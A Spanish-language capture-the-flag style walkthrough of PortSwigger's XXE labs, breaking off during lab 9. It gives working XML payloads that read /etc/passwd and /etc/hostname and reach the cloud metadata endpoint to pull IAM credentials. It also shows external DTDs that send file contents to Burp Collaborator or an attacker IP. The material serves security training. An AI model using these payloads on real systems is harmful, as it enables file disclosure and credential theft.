XXE - Laboratorios de PortSwigger
Índice de contenido
- Explotación de XXE usando entidades externas para recuperar archivos.
- Explotación de XXE para realizar ataques SSRF.
- XXE Blind With Out-of-band.
- Prueba de laboratorio local antes del siguiente laboratorio.
- XXE Blind With Out-of-band a través de entidades de parámetros XML.
- Explotación de XXE Blind para exfiltrar datos usando un DTD externo malicioso.
- Explotación de XXE blind para recuperar datos a través de mensajes de error
- Explotación de XInclude para recuperar archivos.
- Explotación de XXE a través de la carga de archivos de imagen.
- Explotación de XXE para recuperar datos mediante la reutilización de una DTD local.
Laboratorio 1: Explotación de XXE usando entidades externas para recuperar archivos
Vemos las indicaciones del primer laboratorio:
Primero nos dice que este laboratorio contiene una función la cual es Comprobar existencias de productos, y nos dice cuantos productos de eso quedan, también dice que se tramita en formato XML.
Nos dice que para completar este laboratorio debemos mostrar el contenido que está en el archivo /etc/passwd interno de la máquina víctima.
Primero accederemos al laboratorio y veremos lo siguiente:
Vemos que nos muestra una web de una tienda, y al abrir algún producto veremos lo siguiente:
Podemos apreciar que debajo del producto al que entramos nos muestra esta función que nos comprueba la existencia de productos disponibles.
Ahora daremos click a “Check stock” pero ahora vamos a interceptar la petición con BurpSuite, y recibimos la siguiente petición:
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>
9
</productId>
<storeId>
1
</storeId>
</stockCheck>
Podemos ver en la petición que se está tramitando una petición con formato XML para tramitar datos.
Intentaremos hacer lo que explicamos en el post anterior, inyectaremos nuestra propia entidad genérica para ver si funciona y nos interpreta lo que inyectemos:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe "Prueba"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>
Podemos ver que después de agregar nuestra entidad genérica en el DTD, llamada xxe con el valor de “Prueba”, y vemos que nos responde lo siguiente:
Podemos apreciar que nos responde el mensaje: “Invalid product ID: Prueba”, y llamamos a la entidad en las etiquetas de productId, ya que ahí nos dimos cuenta que se estaban devolviendo valores en pantalla y poder verlos.
Ahora que sabemos que podemos inyectar entidades entonces inyectaremos una entidad externa para tomar los datos de /etc/passwd, para ello hacemos lo siguiente:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>
Recordamos que usando el wrapper “file://” podemos recuperar datos de un archivo.
Al tramitar la petición veremos lo siguiente:
Podemos apreciar que nos ha dado el archivo /etc/passwd, y hemos terminado con este primer laboratorio:
Laboratorio 2: Explotación de XXE para realizar ataques SSRF
En este laboratorio haremos uso del XXE para hacer ataques SSRF, que enseguida veremos que es.
El SSRF(Server-Side Request forgery) es un ataque y lo que hace es por ejemplo, tenemos acceso a un servidor web el cual tiene integrada una función la cual te descarga lo que le pongas en la entrada de esa función, pero en caso de que en la red interna del servidor existan otros equipos conectados a la misma red, podríamos descargas datos importantes de alguna máquina que esté en la red del servidor web.
Veamos un ejemplo:
Como podemos ver en el ejemplo del diagrama, nuestra máquina atacante tiene conexión con el servidor web, pero no con las máquinas internas de ese servidor web, entonces lo que hace el SSRF es conectarse al servidor web, y desde el servidor web hacer peticiones maliciosas con el fin de obtener información importante, lo que hacemos es atacar a las máquinas internas desde el servidor web, y de esta forma si tendremos acceso a esas máquinas internas.
Lo que haremos en este nivel será como dice, haremos un SSRF aprovechándonos de un XXE.
Nos dice que del lado del servidor hay un EC2 lo cual en pocas palabras es una especie de servidor en la nube, como están en la misma red nos dice que debemos recuperar una clave secreta usando una funcion que tiene el servidor web principal, el cual es recuperar metadatos, y esto lo veremos ahora.
También nos dice que la vulnerabilidad XXE se ejecuta desde la función “check stock”.
Así que primero iniciaremos el laboratorio en el apartado vulnerable:
Daremos en check stock e interceptaremos la petición para ver que nos muestra:
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>
1
</productId>
<storeId>
1
</storeId>
</stockCheck>
Podemos ver la siguiente estructura XML, por lo que intentaremos inyectar nuestra entidad en el DTD, y ver si es vulnerable:
Podemos apreciar que nos muestra el contenido del servidor, por lo que es vulnerable, así que ahora lo que haremos es el objetivo de este laboratorio, descubrir la clave secreta que está dentro de un servidor aislado de nuestra máquina atacante, pero al cual en teoría podemos acceder haciendo las consultas desde el servidor web, y como ese servidor web está en la misma red que el servidor aislado, podremos tener conexión.
Vemos que en las instrucciones del laboratorio nos dice que existe un EC2 que como recordamos es un servidor que está en la red interna del servidor que intentamos atacar, nos dice que la IP del EC2 es http://169.254.169.254/.
Así que un esquema de lo que estamos haciendo ahora sería algo así:
Podemos apreciar que tenemos conexión con el servidor web, pero no con la máquina EC2 a la que el servidor web si tiene acceso.
Y en caso de que ese servidor tenga capacidad de directory listing podremos ver datos y buscar algo valioso.
Así que ahora a través de la vulnerabilidad XML, llamaremos a la IP del servidor EC2, y como la petición la interpretará el servidor web y ese servidor web tiene acceso al EC2, entonces nos podrá listar algo en caso de estar habilitado un directory listing.
Nuestra consulta se verá así:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>
Y vemos que al tramitar la petición nos responde lo siguiente:
Podemos apreciar que nos ha listado una ruta llamada latest en el mensaje de respuesta, así que agregaremos ese valor a la url de la entidad y veremos que queda así:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>
Y ahora veremos la respuesta:
Ahora nos listó otra ruta llamada meta-data, por lo cual la pondremos en la URL y seguir para ver que más encontramos:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>
Y vemos la respuesta:
Ahora vemos otra ruta llamada iam, la cual al entrar nuevamente agregándola a la URL:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>
Veremos lo siguiente:
Y al acceder a esta otra ruta que encontramos llamada security-credentials veremos lo siguiente:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>
Ahora vemos que dentro de esta ruta encontramos esto:
Encontramos otra ruta o archivo llamado admin, al cual al acceder veremos lo siguiente:
Y podemos ver que hemos encontrado las credenciales al parecer del usuario admin.
Y ya habremos terminado con este laboratorio 2.
Laboratorio 3: XXE Blind With Out-of-band
En este laboratorio vemos que nos pide lo siguiente:
nos dice que debemos usar una entidad externa, o sea alguna URL de otro servidor al que tengamos control de las peticiones que se reciben, y que hagamos una consulta HTTP usando como servidor a recibir, BurpCollaborator.
Al acceder a este nivel y como sabemos interceptar la petición donde está la parte vulnerable vemos la siguiente estructura XML:
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>
9
</productId>
<storeId>
1
</storeId>
</stockCheck>
Podemos apreciar que tenemos esta estructura XML, y como ya hemos visto trataremos de inyectar nuestra entidad en el DTD:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe "hola"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>
Podemos apreciar que nos dice que el ID del producto es inválido, esta vez ya no nos está devolviendo ningún valor de alguna etiqueta que está en la estructura XML.
Por lo que en estos casos toca trabajar a ciegas usando algún servidor externo, BurpSuiteProfessional contiene un apartado llamado “BurpCollaboratorClient”, que se encuentra en la pestaña de arriba de Burp, lo que hace este apartado es crearnos un servidor al cual podamos enviar peticiones para practicar esto, al abrir ese apartado veremos lo siguiente:
Vemos este menú, y en la parte de Generate collaborator payloads, vemos un botón que dice Copy to clipboard, al darle nos copiara una URL de un servidor que se acaba de crear y podremos recibir las peticiones que le hagamos, en el objetivo de este nivel solo es enseñarnos a usar esta función, así que al agregar esta URL a la petición:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://pjctd07aibvq11qf4eds3tzp7gd61v.burpcollaborator.net"> ]>
<stockCheck>
<productId>
14
</productId>
<storeId>
1
</storeId>
</stockCheck>
Vemos que nos responde el mensaje Invalid product ID, pero si ahora en la sección de BurpCollaborator vamos y damos en el botón de PollNow veremos lo siguiente:
Podemos apreciar que hemos recibido a nuestro servidor de burp, la petición HTTP que hemos interceptado y enviado.
Y como este laboratorio solo era mostrarnos como funciona el BurpCollaborator habremos terminado este laboratorio:
Prueba de laboratorio local antes del siguiente laboratorio.
Primero volveremos a hacer un ejemplo que debemos entender antes que el laboratorio 4, y después seguiremos con el laboratorio 4.
Volveremos a usar nuestro laboratorio que montamos en docker, una vez estemos, recordaremos que al interceptar una petición veremos algo así:
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>Dansh</name>
<tel>123123</tel>
<email>dansh@test.com</email>
<password>qweqwdawe12312</password>
</root>
Como recordamos, podemos ver la petición interceptada de nuestro laboratorio local, y sabemos que es vulnerable, supongamos que queremos hacer la típica manera de inyectar en nuestro DTD una entidad y luego mostrar algo para ver si esto es vulnerable, recuerda que esto se hacía así:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>
<name>Dansh</name>
<tel>123123</tel>
<email>&xxe;</email>
<password>qweqwdawe12312</password>
</root>
En este caso si nos mostrara el archivo “/etc/passwd”, pero vamos a suponer que no nos respondió nada, y solo nos mostró algún mensaje de advertencia, por ejemplo “no se pueden inyectar entidades”, por poner algún ejemplo, entonces como no nos está mostrando nada, ya que ninguna etiqueta se está devolviendo, lo que podemos hacer en estos casos es lo siguiente, haremos un Out of band interaction.
Y esto lo haremos a través de entidades en el DTD:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://192.168.1.70/prueba"> %xxe; ]>
<root>
<name>Dansh</name>
<tel>123123</tel>
<email>dansh@test.com</email>
<password>qweqwdawe12312</password>
</root>
Ya no es necesario llamar a la entidad fuera del DTD, ya que podría provocar errores.
Vemos que hemos agregado el símbolo de porcentaje al declarar la entidad xxe en el DTD, y también al final llamaremos a la entidad dentro del DTD usando %xxe;.
Lo que definimos en la entidad xxe es que obtendrá un recurso el cual está en este caso en nuestra máquina atacante, para acceder al archivo llamado prueba el cual compartiremos desde nuestra máquina atacante a través de un servidor python HTTP compartido.
Y antes de tramitar la petición debemos activar el servidor compartido en la ruta del archivo prueba, en este caso aún no definí el archivo prueba, por lo que al tramitar la petición, en el historial del servidor python compartido veremos lo siguiente:
Vemos que ya está activo, por lo que tramitaremos la petición anterior XML:
Y podemos apreciar que en la respuesta del servidor web no vemos nada, pero si vamos a la terminal desde donde tenemos el servidor compartido veremos lo siguiente:
Y veremos este error, ya que el archivo prueba aún no existe en nuestro servidor python compartido que ejecuta nuestra máquina atacante, pero con esto comprobamos que ya hay conexión, así que antes de repetir esta petición, lo que haremos será definir el archivo prueba, e indicarle en formato XML acciones maliciosas.
Para ello crearemos un archivo en la ruta del servidor compartido llamado prueba en este caso.
Y este contendrá lo siguiente:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
En esta primera entidad que definimos llamada file, lo que hace es tomar el contenido del archivo /etc/passwd, para después convertirlo a base64, esta entidad la usaremos más adelante, pero debe estar definida.
La siguiente entidad es esta:
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://192.168.1.70/?parametro=%file;'>">
Esta entidad llamada eval, lo que contiene es la definición de otra entidad dentro de esta, pero como sabemos para declarar entidades en el DTD, se necesita usar el porcentaje, pero si lo agregamos dentro de otra entidad esto hará que el servidor se confunda al interpretar estos valores XML dándonos error, por eso debemos poner el porcentaje, pero en formato hexadecimal, el cual es 25, pero debemos agregarle el &#x para que nos funcione, después esta nueva entidad se llamará exfil, que es lo que hará que veamos el /etc/passwd en base64 en el lado del servidor web python.
Dentro de ahí le damos la IP a la que se va a conectar, para después asignar el parámetro llamado parametro por poner un ejemplo, aunque puede ser cualquiera, y el valor de este parámetro será la entidad que creamos llamada file, la cual como recordamos se encargara de obtener el archivo /etc/passwd codificado en base64, y por último llamaremos a las entidades:
%eval;
%exfil;
Primero se define la entidad eval la cual contiene la instrucción de que archivo tomará, y después se llama a la que hará ese proceso para llegar al archivo.
Y nuestro archivo final se verá así:
Al momento de guardar el archivo, activar el servidor HTTP compartido en la ruta del archivo llamado prueba el cual contiene estas entidades, y tramitar la petición, veremos lo siguiente:
Vemos que hemos recibido el valor del archivo /etc/passwd en la respuesta del parámetro llamado parametro.
Por lo que solo queda decodificar el valor de base64 y vemos que se trata del archivo /etc/passwd:
Laboratorio 4: XXE Blind With Out-of-band a través de entidades de parámetros XML
Podemos ver que este laboratorio nos dice que esta vez ya no nos va a permitir inyectar entidades como comúnmente lo hacíamos, y nos dice que para resolver esto debemos hacer una entidad en el DTD y hacer una solicitud HTTP a un servidor de burpcollaborator.
Esto será parecido al ejemplo anterior solo que usando un servidor de burpcollaborator.
Por ahora en este laboratorio solo dice que hagamos la petición a través de la entidad que inyectaremos, más adelante apuntaremos a un archivo, pero por ahora solo nos pide hacer la petición HTTP hacia el servidor de burpcollaborator.
Así que ya teniendo la petición de la parte que sabemos que es vulnerable, en este caso la función de comprobar existencias dentro de la tienda del laboratorio, así que al interceptar una petición de esta función vemos lo siguiente:
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>
9
</productId>
<storeId>
1
</storeId>
</stockCheck>
Podemos ver la típica estructura XML que hemos visto en los laboratorios anteriores, solo que si esta vez intentamos inyectar una entidad común de XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe "hola"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>
Podemos apreciar que nos da el mensaje “Entities are not allowed for security reasons”, por lo que ya no podemos inyectar entidades de esta forma común.
Por lo que ahora tocaría hacer que la petición XML envíe una petición a un servidor web tercero, el cual podría contener algún archivo para que la web víctima interprete el código XML para ejecutar instrucciones maliciosas, pero en este caso primero solo nos interesa la petición al servidor tercero.
Por lo que iremos al apartado de BurpCollaborator y tomaremos una URL:
Damos en “CopyToclipboard”, y obtendremos una URL similar a esta:“a8jfnmr2ktwurmko35ehkcp5vw1mpb.burpcollaborator.net”, esta URL es nuestro servidor tercero temporal creado por burpcollaborator, ahora declararemos una entidad, la cual contendrá una llamada a esta URL, y después llamamos a dicha entidad para que nos haga la petición:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://a8jfnmr2ktwurmko35ehkcp5vw1mpb.burpcollaborator.net"> %xxe;]>
<stockCheck>
<productId>
9
</productId>
<storeId>
1
</storeId>
</stockCheck>
Recuerda que los porcentajes se usan para declarar y llamar desde el DTD.
Y al tramitar esta petición podemos observar que nos muestra otro mensaje que dice “XML parsing error”, pero no le tomaremos importancia, ahora iremos al burpcollaborator y daremos en el botón de pollNow, y veremos que nos ha llegado nuestra petición HTTP desde el servidor del laboratorio:
Y ya habremos tenido la conexión deseada, este laboratorio fue para enseñarnos a hacer entidades desde el DTD y llamar a un servidor tercero, y ver que nos responde, ya que lo siguiente será lo mismo, pero esta vez nos tomara algún archivo con instrucciones maliciosas del servidor tercero.
Así que al ir a ver el laboratorio nuevamente veremos que nos aparece que está completado:
Recuerda apagar el intercept para que se tramite la petición que tenías capturada.
Laboratorio 5: Explotación de XXE Blind para exfiltrar datos usando un DTD externo malicioso.
En este laboratorio 5 veremos que nos pide lo siguiente:
Nos dice que debemos exfiltrar el archivo llamado /etc/hostname, así que si intentamos inyectar nuestras entidades comunes en la petición XML, no nos mostrará nada, por lo que nos ahorramos algo que ya sabemos que va a pasar, así que en la petición hacemos lo que hicimos en el laboratorio anterior:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://6qxjqifs5yua1hf7d27ch2gga7gx4m.burpcollaborator.net"> %xxe;]>
<stockCheck>
<productId>
1
</productId>
<storeId>
1
</storeId>
</stockCheck>
Vemos la petición que hemos interceptado de la función que sabemos que es vulnerable, y también hemos modificado lo que hicimos en el anterior, estamos llamando a un servidor tercero que como sabemos lo hemos hecho usando el burpcollaborator(obviamente una nueva URL), para que nos tome un recurso y en este caso nos lo interpretará.
Y al tramitar la petición, vemos que abajo nos ha respondido el mensaje “XML parsing error”, pero si vamos al lado del servidor el BurpCollaborator veremos que hemos recibido la petición desde el servidor del laboratorio:
Hasta ahora esto ya lo habíamos hecho en el laboratorio anterior, pero ahora el nivel nos dice que debemos filtrar un archivo llamado /etc/hostname, por lo que ahora al ir al laboratorio veremos lo siguiente:
Podemos apreciar que hay 2 opciones nuevas, una para cargar nuestro exploit, y otra para subir la flag, iremos a la primera y veremos lo siguiente:
En este apartado es donde vamos a crear nuestro DTD externo, esta parte en la que estamos es una nueva URL, pero sigue siendo parte del nivel, solo que desde aquí es donde vamos a crear nuestro DTD externo, vemos que hay varias opciones.
En este caso solo modificaremos el contenido, y declararemos el DTD externo que hará instrucciones maliciosas:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://xcdbuvruomslp2moktnz90fjeak28r.burpcollaborator.net/?content=%file;'>">
%eval;
%exfil;
Crear una entidad llamada file para tomar el archivo /etc/hostname, esta vez usamos el wrapper file:// y no el de base64, ya que como este archivo solo tiene 1 línea no tendremos problema al recibir la respuesta.
En la segunda línea estamos declarando la entidad llamada eval, la cual está declarando otra entidad dentro de ella, recordemos que el valor % es el símbolo de porcentaje, pero en hexadecimal para que no se confunda la sintaxis.
Después en esa sub entidad que declaramos llamada exfil, contendrá el contenido el cual conecta con nuestro servidor tercero, y enviamos la petición a nuestro servidor tercero, ya que ahí podremos ver la respuesta que llegan en el registro de burpcollaborator en este caso, y como en la primera entidad llamada file ya tomamos lo que nos interesa, simplemente lo mostraremos a través de un parámetro llamado content, el cual llamará a la entidad file.
Esto último del parámetro, lo que hace es llamar a la entidad file la cual contiene el valor del archivo que nos interesa, y se hace de esta manera para que en los registros de nuestro servidor tercero podamos apreciar el contenido de ese archivo.
Por último se debe llamar a eval y después a exfil, ya que si llamamos primero a exfil no puede llamarse, ya que depende de eval para existir, por lo que primero va eval.
Una vez creado nuestro exploit, lo que haremos será tomar la URL que nos deja arriba:
Y ahora desde la petición que teníamos interceptada, pondremos esta URL que apunta a nuestro exploit:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "https://exploit-0a92004104741dc7c3ae00b101b80069.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
<productId>
1
</productId>
<storeId>
1
</storeId>
</stockCheck>
Y al tramitar la petición, lo que sucederá es que el laboratorio de donde interceptamos la petición XML, se comunicará a ese servidor externo nuestro, en este caso es la web que contiene el exploit con las instrucciones maliciosas, una vez esto, lo que sucederá es que nuestro servidor del laboratorio donde interceptamos el XML, interpretará las instrucciones maliciosas que teníamos subidas a nuestro servidor tercero, las interpretara en su propio servidor, por lo que tomara el archivo que queremos de su propio servidor, osea el del laboratorio donde interceptamos el XML.
Una vez que tramitemos esto, iremos al registro del servidor tercero, o sea al burpcollaborator en este caso:
Y podemos apreciar abajo en la respuesta que hemos recibido el contenido del archivo /etc/hostname, a través del parámetro content.
Y este valor será la flag para terminar el laboratorio:
Y habremos terminado este nivel:
Laboratorio 6: Explotación de XXE blind para recuperar datos a través de mensajes de error
Vemos que nos pide lo siguiente:
Podemos observar que nos dice que debemos recuperar el archivo llamado /etc/passwd, a través de un DTD externo, para así provocar un error en la respuesta y en base a ese error modificar algún parámetro para mostrar lo que queremos.
Primero lo que haremos será entrar al laboratorio, y recordemos que la parte vulnerable es la siguiente función de comprobar existencias:
Y al tramitar esta petición al darle click al botón naranja para que se tramite la petición, la interceptaremos con BurpSuite:
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>
6
</productId>
<storeId>
1
</storeId>
</stockCheck>
Y podemos apreciar la estructura XML que se tramita por detrás, como ya sabemos intentaremos inyectar una entidad básica:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe "Prueba"> ]>
<stockCheck>
<productId>
6
</productId>
<storeId>
1
</storeId>
</stockCheck>
Podemos apreciar que nos dice que no se pueden inyectar entidades por motivos de seguridad dándonos este mensaje: “Entities are not allowed for security reasons”.
Así que ahora lo que se nos viene a la mente es probar con un DTD externo, para ello haremos uso del burpcollaborator:
En este caso solo lo usamos para saber si hay conexión, pero no es necesario usar collaborator.
Damos a “Copy to clipboard”, para obtener nuestro servidor tercero temporal y desde aquí ver lo que va sucediendo.
Una vez tengamos la URL copiada, crearemos el DTD externo:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f6mtwp6r71voyhr9ywx16mnn7ed51u.burpcollaborator.net"> %xxe; ]>
<stockCheck>
<productId>
6
</productId>
<storeId>
1
</storeId>
</stockCheck>
Y podemos apreciar que ahora no nos da el mensaje de hace un momento, el que decía que no es posible inyectar entidades, en este caso nos da un error más complejo.
Y en el mensaje de respuesta del error vemos algo interesante:
Podemos ver que llama al nombre de la página a la que hizo una petición, por lo que esto nos hace pensar que por medio de un parámetro podemos obtener cosas valiosas.
Pero antes de esto primero vemos si la conexión a nuestro servidor tercero se hizo correctamente:
Al dar a Poll now podemos apreciar que tuvimos conexión exitosa, por lo que podemos continuar.
Ahora en el laboratorio veremos lo siguiente:
Damos al botón, esto nos llevará a la página donde crearemos nuestro exploit, veremos lo siguiente:
Y ahora lo que haremos aquí no será lo mismo que en el laboratorio anterior, es algo parecido, pero no lo mismo.
Podemos apreciar lo siguiente:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///archivoinexistente/%file;'>">
%eval;
%exfil;
En la primera línea estamos definiendo la entidad file desde un DTD externo, estamos tomando el archivo /etc/passwd.
En la segunda línea estamos declarando otra entidad llamada eval, la cual dentro de su definición de valor estamos definiendo una sub entidad llamada exfil, recuerda que usamos los caracteres % en lugar del %, ya que en sub entidades suele dar error si ponemos el símbolo en formato normal y no en hexadecimal. Y esta sub entidad va a contener la llamada a un archivo que no existe, pero al final estamos llamando a la entidad file, que como sabemos contiene el archivo que nos interesa.
Por último llamamos a las entidades en orden.
Y una vez configurado nuestro exploit, en la parte de arriba nos darán la URL, esta URL contiene nuestras instrucciones XML maliciosas.
Ahora en la petición interceptada lo que haremos será que haremos la petición hacia la URL que nos ha dado en donde creamos el exploit:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "https://exploit-0a8500d703e64cd8803d6bac01df0023.exploit-server.net/exploit"> %xxe; ]>
<stockCheck>
<productId>
6
</productId>
<storeId>
1
</storeId>
</stockCheck>
Y podemos ver que al enviar la petición abajo ya nos muestra el archivo /etc/passwd, que queríamos.
Lo que paso fue que hicimos una petición desde la web del laboratorio y como el laboratorio interpreto esas instrucciones que le indicamos de una URL externa, interpreto esas instrucciones XML maliciosas en su propio servidor, por lo que en la respuesta de error vemos a través del wrapper file el archivo que nos interesa.
Y con esto hemos terminado este laboratorio.
Laboratorio 7: Explotación de XInclude para recuperar archivos
En este laboratorio nos piden lo siguiente:
Podemos ver que nos dice que en esto, no podemos inyectar nuestro DTD clásico, ya que no tenemos control sobre todo el documento XML.
Y que como alternativa usemos Xinclude para poder recuperar el archivo /etc/passwd.
Xinclude lo que hace es interpretar el documento que se le pasa como XML, y no le podemos pasar /etc/passwd, porque no es un XML, pero si podemos hacer otra cosa, la cual es agregar un atributo especial para que nos deje hacer lo que queremos.
Pero primero empecemos desde el inicio, primero al interceptar la petición de la función de comprobar existencias veremos lo siguiente:
Como podemos observar, esta vez no hay ninguna estructura XML que se esté ejecutando, así que intentaremos lo siguiente, iremos a esta web PayloadsAllTheThings
Y nos llevará a un repositorio de github donde swisskyrepo ha reunido múltiples payloads para diferentes ataques.
En este caso entraremos a la carpeta de XXE, y vamos a la sección que dice xinclude attacks y veremos lo siguiente:
Veremos la siguiente estructura XML:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
Lo que hace es que en la primera línea estamos definiendo el elemento principal, que se declara con foo, y lo que hace el atributo xmln:xi es establecer el espacio de nombres. (se necesita una base para que funcione, en este caso usamos esta).
Y la siguiente línea estamos incluyendo el archivo de tipo text que se define el valor del archivo que recibiremos con parse, y ese archivo lo recibiremos de href, donde seguido le pasamos el archivo que nos interesa, y por último cerramos el foo.
Este XXE funciona, ya que estamos usando un valor que la web devuelve su valor, pero en caso de que sea un valor estático, obviamente no funcionará.
Una vez entendimos esta estructura, lo que haremos será agregarla a nuestra petición en lugar del ID del producto, quedándonos así:
Y como podemos ver, hemos obtenido el archivo /etc/passwd, completando así este laboratorio:
Laboratorio 8: explotación de XXE a través de la carga de archivos de imagen
En el siguiente laboratorio nos pide lo siguiente:
Nos dice que podemos subir avatares, o sea, imágenes el formato SVG, y también nos dice que usa Batik, que es una biblioteca de java que nos sirve para renderizar gráficos SVG, en el lenguaje de marcado XML, para transformarlos a imagen.
Y que debemos obtener el archivo /etc/hostname a través de esto.
Parece confuso, pero iremos paso a paso, primero ingresaremos al laboratorio:
Podemos apreciar que al entrar nos aparecen diferentes post, en este caso accederemos al primero y daremos donde dice view post.
Al entrar nos llevará a una página donde veremos un post, y al final veremos esto:
Vemos esta sección de comentarios, donde podemos subir nuestro propio comentario.
Iremos de nuevo a la página de PayloadsAllTheThings, y veremos una sección que dice:
Vemos que nos muestra diferentes payloads con lo que podemos hacer lo que queremos, en este caso probaremos el classic, el cual su estructura se ve así:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
Y esta estructura XML lo que hará es que primero declaramos una entidad llamada xxe, la cual contiene el valor del archivo /etc/hostname, y después se agrega la imagen en formato svg seguido de que llamaremos a nuestra entidad para que nos muestre el resultado dentro de ese formato.
Esta estructura será colocada dentro de un archivo con formato .SVG, el cual crearemos a continuación y meteremos estos datos:
Y ahora guardamos, y en la sección de comentarios subiremos nuestra imagen, y antes de publicar nuestro comentario nos pondremos en escucha desde el intercept de BurpSuite, y al dar a enviar comentario recibiremos la siguiente petición:
Podemos apreciar que hemos interceptado el archivo .SVG, y vemos la estructura XML que hemos inyectado, en caso de error debemos unificar la estructura XML que vemos.
En este caso no nos dio error, y nos mandó un estado 302, lo cual es un redirect, que arriba en burpsuite damos a Follow redirection para que nos lleve a donde nos redirige la web.
Podemos apreciar en la respuesta que nuestro comentario se ha subido correctamente en la web.
Ahora si volvemos al post veremos nuestro comentario:
Y podemos apreciar que tiene una imagen en el avatar, como es SVG y le hemos dicho que nos muestre el archivo /etc/hostname veremos ese valor en esa imagen, para apreciarla mejor damos click derecho a la imagen y damos en abrir imagen en una pestaña nueva, y podremos apreciar que la imagen que nos creó es lo que hemos dicho que nos lo muestre:
Podemos apreciar el nombre de host, y con esto lo ponemos como flag y terminamos este laboratorio:
Laboratorio 9: Explotación de XXE para recuperar datos mediante la reutilización de una DTD local
En este último laboratorio veremos que nos pide lo siguiente:
Dice que la vulnerabilidad se encuentra en la función de comprobar existencias, dice que nos analiza el resultado, nos interpreta todo, pero no muestra ninguna respuesta, y lo que debemos hacer es recuperar el contenido del archivo /etc/passwd, y para lograr esto debemos hacer referencia a un archivo DTD y usando ese DTD redefiniremos una entidad que haga lo que deseamos.
Existe una lista con varios DTD posibles que pueden existir internamente y podemos ver la lista aquí:
Ahora interceptaremos una petición del apartado vulnerable, y ahora lo que haremos ahora será intentar llamar una entidad con un contenido inexistente para ver que nos responde:
Podemos apreciar que en la respuesta nos da el siguiente mensaje: “XML parser exited with error: java.io.FileNotFoundException: /etc/inexistente (No such file or directory)”, nos da el mensaje de que no existe el archivo o directorio, así que ahora con la lista que tenemos de los DTD, lo que haremos será un ataque de diccionario para intentar descubrir si existen algunos DTD, lo haremos enviando la petición al intruder y en la pestaña de positions daremos a clear, y después seleccionaremos el apartado donde queremos que se haga el ataque de diccionario:
Después daremos a add, en este caso es la parte del archivo que lee el wrapper, que lo que haremos será ir probando la lista de DTD para probar por cada una, una vez asignemos la parte del ataque lo que haremos será ir a la pestaña de payloads, y en ese apartado pegaremos la lista que conseguimos:
Y por último desactivamos la Url-encode automatica:
Y ahora que desactivemos esto para evitar que el archivo se url-encodee, lo que haremos es dar en start attack, y esperaremos a que cargue:
Podemos apreciar que hay 5 DTD posibles que nos han respondido una respuesta diferente a 400 que significa el error.
Vemos que hay 4 respuestas que nos dan 200, y buscando en internet algunas maneras de explotar estos DTD para inyectar nuestras entidades encontramos lo siguiente:
